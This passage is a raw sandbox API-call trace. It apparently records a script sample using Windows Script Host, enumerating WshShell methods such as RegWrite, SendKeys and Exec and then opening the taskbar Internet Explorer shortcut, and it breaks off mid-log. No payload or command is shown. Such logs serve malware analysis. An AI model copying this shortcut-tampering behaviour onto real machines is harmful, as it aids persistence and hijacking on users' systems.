pcNames=0x5a0dd4c*=0x2) returned 0x0 [0166.209] SysStringByteLen (bstr="ExpandEnvironmentStrings") returned 0x30 [0166.209] SysStringByteLen (bstr="ExpandEnvironmentStrings") returned 0x30 [0166.209] SysStringByteLen (bstr="Src") returned 0x6 [0166.209] SysStringByteLen (bstr="Src") returned 0x6 [0166.209] CoTaskMemFree (pv=0x6319730) [0166.210] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.210] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0xd, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.210] CoTaskMemAlloc (cb=0x8) returned 0x6319730 [0166.210] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=2000, rgBstrNames=0x6319730, cMaxNames=0x2, pcNames=0x5a0dd4c | out: rgBstrNames=0x6319730*="RegRead", pcNames=0x5a0dd4c*=0x2) returned 0x0 [0166.210] SysStringByteLen (bstr="RegRead") returned 0xe [0166.210] SysStringByteLen (bstr="RegRead") returned 0xe [0166.210] SysStringByteLen (bstr="Name") returned 0x8 [0166.210] SysStringByteLen (bstr="Name") returned 0x8 [0166.210] CoTaskMemFree (pv=0x6319730) [0166.211] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.211] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0xe, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.211] CoTaskMemAlloc (cb=0x10) returned 0x5bfab28 [0166.211] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=2001, rgBstrNames=0x5bfab28, cMaxNames=0x4, pcNames=0x5a0dd4c | out: rgBstrNames=0x5bfab28*="RegWrite", pcNames=0x5a0dd4c*=0x4) returned 0x0 [0166.211] SysStringByteLen (bstr="RegWrite") returned 0x10 [0166.211] SysStringByteLen (bstr="RegWrite") returned 0x10 [0166.211] SysStringByteLen (bstr="Name") returned 0x8 [0166.211] SysStringByteLen (bstr="Name") returned 0x8 [0166.211] SysStringByteLen (bstr="Value") returned 0xa [0166.211] SysStringByteLen (bstr="Value") returned 0xa [0166.211] SysStringByteLen (bstr="Type") returned 0x8 [0166.211] SysStringByteLen (bstr="Type") returned 0x8 [0166.211] CoTaskMemFree (pv=0x5bfab28) [0166.212] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.212] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0xf, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.212] CoTaskMemAlloc (cb=0x8) returned 0x6319730 [0166.212] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=2002, rgBstrNames=0x6319730, cMaxNames=0x2, pcNames=0x5a0dd4c | out: rgBstrNames=0x6319730*="RegDelete", pcNames=0x5a0dd4c*=0x2) returned 0x0 [0166.212] SysStringByteLen (bstr="RegDelete") returned 0x12 [0166.213] SysStringByteLen (bstr="RegDelete") returned 0x12 [0166.213] SysStringByteLen (bstr="Name") returned 0x8 [0166.213] SysStringByteLen (bstr="Name") returned 0x8 [0166.213] CoTaskMemFree (pv=0x6319730) [0166.213] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.213] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x10, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.213] CoTaskMemAlloc (cb=0x10) returned 0x5bfab28 [0166.213] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=3000, rgBstrNames=0x5bfab28, cMaxNames=0x4, pcNames=0x5a0dd4c | out: rgBstrNames=0x5bfab28*="LogEvent", pcNames=0x5a0dd4c*=0x4) returned 0x0 [0166.214] SysStringByteLen (bstr="LogEvent") returned 0x10 [0166.214] SysStringByteLen (bstr="LogEvent") returned 0x10 [0166.214] SysStringByteLen (bstr="Type") returned 0x8 [0166.214] SysStringByteLen (bstr="Type") returned 0x8 [0166.214] SysStringByteLen (bstr="Message") returned 0xe [0166.214] SysStringByteLen (bstr="Message") returned 0xe [0166.214] SysStringByteLen (bstr="Target") returned 0xc [0166.214] SysStringByteLen (bstr="Target") returned 0xc [0166.214] CoTaskMemFree (pv=0x5bfab28) [0166.215] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x62ae0e8 [0166.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x11, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.215] CoTaskMemAlloc (cb=0xc) returned 0x5bfab28 [0166.215] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=3010, rgBstrNames=0x5bfab28, cMaxNames=0x3, pcNames=0x5a0dd4c | out: rgBstrNames=0x5bfab28*="AppActivate", pcNames=0x5a0dd4c*=0x3) returned 0x0 [0166.215] SysStringByteLen (bstr="AppActivate") returned 0x16 [0166.215] SysStringByteLen (bstr="AppActivate") returned 0x16 [0166.215] SysStringByteLen (bstr="App") returned 0x6 [0166.215] SysStringByteLen (bstr="App") returned 0x6 [0166.215] SysStringByteLen (bstr="Wait") returned 0x8 [0166.215] SysStringByteLen (bstr="Wait") returned 0x8 [0166.215] CoTaskMemFree (pv=0x5bfab28) [0166.216] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x62ae0e8 [0166.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x12, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.216] CoTaskMemAlloc (cb=0xc) returned 0x5bfab28 [0166.216] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=3011, rgBstrNames=0x5bfab28, cMaxNames=0x3, pcNames=0x5a0dd4c | out: rgBstrNames=0x5bfab28*="SendKeys", pcNames=0x5a0dd4c*=0x3) returned 0x0 [0166.216] SysStringByteLen (bstr="SendKeys") returned 0x10 [0166.216] SysStringByteLen (bstr="SendKeys") returned 0x10 [0166.216] SysStringByteLen (bstr="Keys") returned 0x8 [0166.216] SysStringByteLen (bstr="Keys") returned 0x8 [0166.217] SysStringByteLen (bstr="Wait") returned 0x8 [0166.217] SysStringByteLen (bstr="Wait") returned 0x8 [0166.217] CoTaskMemFree (pv=0x5bfab28) [0166.217] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x13, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.217] CoTaskMemAlloc (cb=0x8) returned 0x6319730 [0166.218] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=3012, rgBstrNames=0x6319730, cMaxNames=0x2, pcNames=0x5a0dd4c | out: rgBstrNames=0x6319730*="Exec", pcNames=0x5a0dd4c*=0x2) returned 0x0 [0166.218] SysStringByteLen (bstr="Exec") returned 0x8 [0166.218] SysStringByteLen (bstr="Exec") returned 0x8 [0166.218] SysStringByteLen (bstr="Command") returned 0xe [0166.218] SysStringByteLen (bstr="Command") returned 0xe [0166.218] CoTaskMemFree (pv=0x6319730) [0166.218] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x14, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.218] CoTaskMemAlloc (cb=0x4) returned 0x6319730 [0166.218] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=3013, rgBstrNames=0x6319730, cMaxNames=0x1, pcNames=0x5a0dd4c | out: rgBstrNames=0x6319730*="CurrentDirectory", pcNames=0x5a0dd4c*=0x1) returned 0x0 [0166.218] SysStringByteLen (bstr="CurrentDirectory") returned 0x20 [0166.218] SysStringByteLen (bstr="CurrentDirectory") returned 0x20 [0166.219] CoTaskMemFree (pv=0x6319730) [0166.219] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dbc4, index=0x15, ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0dd7c, pDummy=0x44f89ed2) returned 0x0 [0166.219] CoTaskMemAlloc (cb=0x8) returned 0x6319730 [0166.219] ITypeInfo:RemoteGetNames (in: This=0x5c3dbc4, memid=3013, rgBstrNames=0x6319730, cMaxNames=0x2, pcNames=0x5a0dd4c | out: rgBstrNames=0x6319730*="CurrentDirectory", pcNames=0x5a0dd4c*=0x1) returned 0x0 [0166.219] SysStringByteLen (bstr="CurrentDirectory") returned 0x20 [0166.219] SysStringByteLen (bstr="CurrentDirectory") returned 0x20 [0166.219] CoTaskMemFree (pv=0x6319730) [0166.219] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dbc4) returned 0x5c0c9a0 [0166.374] CoCreateGuid (in: pguid=0x5a0c884 | out: pguid=0x5a0c884*(Data1=0xde80c454, Data2=0xbdcc, Data3=0x4a68, Data4=([0]=0x89, [1]=0x92, [2]=0x6a, [3]=0x57, [4]=0x7, [5]=0x73, [6]=0xdf, [7]=0xc2))) returned 0x0 [0166.476] CoCreateGuid (in: pguid=0x5a0c81c | out: pguid=0x5a0c81c*(Data1=0x20f84c36, Data2=0x88f2, Data3=0x467c, Data4=([0]=0xa4, [1]=0x3b, [2]=0x4e, [3]=0xb8, [4]=0xc4, [5]=0x70, [6]=0x4a, [7]=0xe0))) returned 0x0 [0166.498] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x5bfa888 [0166.507] CoGetContextToken (in: pToken=0x5a0da9c | out: pToken=0x5a0da9c) returned 0x0 [0166.507] WshShell:IUnknown:QueryInterface (in: This=0x283d34, riid=0x71d96a28*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0db08 | out: ppvObject=0x5a0db08*=0x283d20) returned 0x0 [0166.516] WshShell:IDispatch:Invoke (in: This=0x283d20, dispIdMember=1002, riid=0x5bfa888*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x0, wFlags=0x3, pDispParams=0x5a0debc*(rgvarg=([0]=0x5a0deac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\internet explorer (2).lnk"), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0de9c, pExcepInfo=0x5a0de7c, puArgErr=0x5a0de78 | out: pDispParams=0x5a0debc*(rgvarg=([0]=0x5a0deac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer (2).lnk", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x5a0de9c*(varType=0x9, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x283d50, varVal2=0x0), pExcepInfo=0x5a0de7c*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x5a0de78*=0x0) returned 0x0 [0166.655] WshShell:IUnknown:QueryInterface (in: This=0x283d50, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d934 | out: ppvObject=0x5a0d934*=0x283d60) returned 0x0 [0166.655] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0d8e8 | out: ppvObject=0x5a0d8e8*=0x0) returned 0x80004002 [0166.655] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d710 | out: ppvObject=0x5a0d710*=0x283d70) returned 0x0 [0166.655] WshShell:IProvideClassInfo:GetClassInfo (in: This=0x283d70, ppTI=0x5a0d718 | out: ppTI=0x5a0d718*=0x5c3dcf8) returned 0x0 [0166.677] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0d70c, pDummy=0x40e4b294 | out: ppTypeAttr=0x5a0d70c, pDummy=0x40e4b294) returned 0x0 [0166.677] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x5bcd228 [0166.677] WshShell:IUnknown:Release (This=0x283d70) returned 0x2 [0166.677] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x1 [0166.678] WshShell:IUnknown:AddRef (This=0x283d60) returned 0x3 [0166.678] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d244 | out: ppvObject=0x5a0d244*=0x0) returned 0x80004002 [0166.678] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d1f4 | out: ppvObject=0x5a0d1f4*=0x0) returned 0x80004002 [0166.678] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d200 | out: ppvObject=0x5a0d200*=0x0) returned 0x80004002 [0166.678] CoGetContextToken (in: pToken=0x5a0d260 | out: pToken=0x5a0d260) returned 0x0 [0166.678] CoGetContextToken (in: pToken=0x5a0d674 | out: pToken=0x5a0d674) returned 0x0 [0166.678] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d6f4 | out: ppvObject=0x5a0d6f4*=0x0) returned 0x80004002 [0166.678] WshShell:IUnknown:Release (This=0x283d60) returned 0x2 [0166.682] WshShell:IUnknown:Release (This=0x283d20) returned 0x2 [0166.682] CoGetContextToken (in: pToken=0x5a0ddb4 | out: pToken=0x5a0ddb4) returned 0x0 [0166.682] CoGetContextToken (in: pToken=0x5a0dd14 | out: pToken=0x5a0dd14) returned 0x0 [0166.682] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x5a0dde4*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x5a0dde0 | out: ppvObject=0x5a0dde0*=0x0) returned 0x80004002 [0166.685] CoGetContextToken (in: pToken=0x5a0ddcc | out: pToken=0x5a0ddcc) returned 0x0 [0166.685] CoGetContextToken (in: pToken=0x5a0dd2c | out: pToken=0x5a0dd2c) returned 0x0 [0166.685] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x5a0ddfc*(Data1=0xb86a98cc, Data2=0xdcc0, Data3=0x3205, Data4=([0]=0x87, [1]=0x77, [2]=0x79, [3]=0x11, [4]=0xa0, [5]=0x7d, [6]=0xaa, [7]=0xaf)), ppvObject=0x5a0ddf8 | out: ppvObject=0x5a0ddf8*=0x0) returned 0x80004002 [0166.747] CoGetContextToken (in: pToken=0x5a0ddb4 | out: pToken=0x5a0ddb4) returned 0x0 [0166.747] CoGetContextToken (in: pToken=0x5a0dd14 | out: pToken=0x5a0dd14) returned 0x0 [0166.747] WshShell:IUnknown:QueryInterface (in: This=0x283d60, riid=0x5a0dde4*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dde0 | out: ppvObject=0x5a0dde0*=0x283d50) returned 0x0 [0166.747] WshShell:IUnknown:AddRef (This=0x283d50) returned 0x3 [0166.747] WshShell:IUnknown:Release (This=0x283d50) returned 0x2 [0166.759] WshShell:IDispatch:GetTypeInfoCount (in: This=0x283d50, pctinfo=0x5a0dde8 | out: pctinfo=0x5a0dde8) returned 0x0 [0166.759] WshShell:IDispatch:GetTypeInfo (in: This=0x283d50, iTInfo=0x0, lcid=0x0, ppTInfo=0x5a0dde4 | out: ppTInfo=0x5a0dde4*=0x5c3dcf8) returned 0x0 [0166.759] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d8e4 | out: ppvObject=0x5a0d8e4*=0x5c3dcf8) returned 0x0 [0166.759] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0d898 | out: ppvObject=0x5a0d898*=0x0) returned 0x80004002 [0166.759] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d6c0 | out: ppvObject=0x5a0d6c0*=0x0) returned 0x80004002 [0166.760] WshShell:IUnknown:AddRef (This=0x5c3dcf8) returned 0x4 [0166.760] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d1f4 | out: ppvObject=0x5a0d1f4*=0x0) returned 0x80004002 [0166.760] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d1a4 | out: ppvObject=0x5a0d1a4*=0x0) returned 0x80004002 [0166.760] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d1b0 | out: ppvObject=0x5a0d1b0*=0x0) returned 0x80004002 [0166.760] CoGetContextToken (in: pToken=0x5a0d210 | out: pToken=0x5a0d210) returned 0x0 [0166.760] CoGetContextToken (in: pToken=0x5a0d624 | out: pToken=0x5a0d624) returned 0x0 [0166.760] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d6a4 | out: ppvObject=0x5a0d6a4*=0x0) returned 0x80004002 [0166.760] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x3 [0166.760] CoGetContextToken (in: pToken=0x5a0dc04 | out: pToken=0x5a0dc04) returned 0x0 [0166.760] CoGetContextToken (in: pToken=0x5a0db64 | out: pToken=0x5a0db64) returned 0x0 [0166.760] WshShell:IUnknown:QueryInterface (in: This=0x5c3dcf8, riid=0x5a0dc34*(Data1=0x20401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dc30 | out: ppvObject=0x5a0dc30*=0x5c3dcf8) returned 0x0 [0166.760] WshShell:IUnknown:AddRef (This=0x5c3dcf8) returned 0x5 [0166.760] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x4 [0166.760] WshShell:IUnknown:Release (This=0x5c3dcf8) returned 0x3 [0166.760] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dcf8, ppTypeAttr=0x5a0dde8, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0dde8, pDummy=0x44f89ed2) returned 0x0 [0166.761] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dcf8) returned 0x5bcd228 [0166.761] ITypeInfo:GetRefTypeOfImplType (in: This=0x5c3dcf8, index=0xffffffff, pRefType=0x5a0dde8 | out: pRefType=0x5a0dde8*=0xfffffffe) returned 0x0 [0166.761] ITypeInfo:GetRefTypeInfo (in: This=0x5c3dcf8, hreftype=0xfffffffe, ppTInfo=0x5a0dda4 | out: ppTInfo=0x5a0dda4*=0x5c3dccc) returned 0x0 [0166.761] WshShell:IUnknown:QueryInterface (in: This=0x5c3dccc, riid=0x71cb2a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d868 | out: ppvObject=0x5a0d868*=0x5c3dccc) returned 0x0 [0166.761] WshShell:IUnknown:QueryInterface (in: This=0x5c3dccc, riid=0x71da1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5a0d81c | out: ppvObject=0x5a0d81c*=0x0) returned 0x80004002 [0166.761] WshShell:IUnknown:QueryInterface (in: This=0x5c3dccc, riid=0x71da1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5a0d644 | out: ppvObject=0x5a0d644*=0x0) returned 0x80004002 [0166.761] WshShell:IUnknown:AddRef (This=0x5c3dccc) returned 0x6 [0166.762] WshShell:IUnknown:QueryInterface (in: This=0x5c3dccc, riid=0x71da182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x5a0d178 | out: ppvObject=0x5a0d178*=0x0) returned 0x80004002 [0166.762] WshShell:IUnknown:QueryInterface (in: This=0x5c3dccc, riid=0x71da1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x5a0d128 | out: ppvObject=0x5a0d128*=0x0) returned 0x80004002 [0166.762] WshShell:IUnknown:QueryInterface (in: This=0x5c3dccc, riid=0x71cd1388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d134 | out: ppvObject=0x5a0d134*=0x0) returned 0x80004002 [0166.762] CoGetContextToken (in: pToken=0x5a0d194 | out: pToken=0x5a0d194) returned 0x0 [0166.762] CoGetContextToken (in: pToken=0x5a0d5a4 | out: pToken=0x5a0d5a4) returned 0x0 [0166.762] WshShell:IUnknown:QueryInterface (in: This=0x5c3dccc, riid=0x71da1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0d628 | out: ppvObject=0x5a0d628*=0x0) returned 0x80004002 [0166.762] WshShell:IUnknown:Release (This=0x5c3dccc) returned 0x5 [0166.762] CoGetContextToken (in: pToken=0x5a0db74 | out: pToken=0x5a0db74) returned 0x0 [0166.762] CoGetContextToken (in: pToken=0x5a0dad4 | out: pToken=0x5a0dad4) returned 0x0 [0166.762] WshShell:IUnknown:QueryInterface (in: This=0x5c3dccc, riid=0x5a0dba4*(Data1=0x20401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5a0dba0 | out: ppvObject=0x5a0dba0*=0x5c3dccc) returned 0x0 [0166.762] WshShell:IUnknown:AddRef (This=0x5c3dccc) returned 0x7 [0166.762] WshShell:IUnknown:Release (This=0x5c3dccc) returned 0x6 [0166.762] WshShell:IUnknown:Release (This=0x5c3dccc) returned 0x5 [0166.762] ITypeInfo:RemoteGetTypeAttr (in: This=0x5c3dccc, ppTypeAttr=0x5a0dde8, pDummy=0x44f89ed2 | out: ppTypeAttr=0x5a0dde8, pDummy=0x44f89ed2) returned 0x0 [0166.762] ITypeInfo:LocalReleaseTypeAttr (This=0x5c3dccc) returned 0x5bcd228 [0166.763] ITypeInfo:RemoteGetDocumentation (in: This=0x5c3dccc, memid=-1, refPtrFlags=0x5a0dd60, pbstrName=0x5a0dd5c, pBstrDocString=0x5a0ddb0, pdwHelpContext=0x5a0dd54, pBstrHelpFile=0x44f89ed2 | out: pbstrName=0x5a0dd5c*="Shortcut Object", pBstrDocString=0x5a0ddb0*=0x0, pdwHelpContext=0x5a0dd54*=0x0, pBstrHelpFile=0x44f89ed2) returned 0x0 [0166.763] SysStringByteLen (bstr="IWshShortcut") returned 0x18 [0166.763] SysStringByteLen (bstr="Shortcut Object") returned 0x1e [0166.763] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x0, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.763] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.763] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x1, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.763] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x6344c70 [0166.763] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x2, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.763] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x6344c70 [0166.764] ITypeInfo:RemoteGetFuncDesc (in: This=0x5c3dccc, index=0x3, ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2 | out: ppFuncDesc=0x5a0ddf4, pDummy=0x44f89ed2) returned 0x0 [0166.764] ITypeInfo:LocalReleaseFuncDesc (This=0x5c3dccc) returned 0x5bcd228 [0166.764] 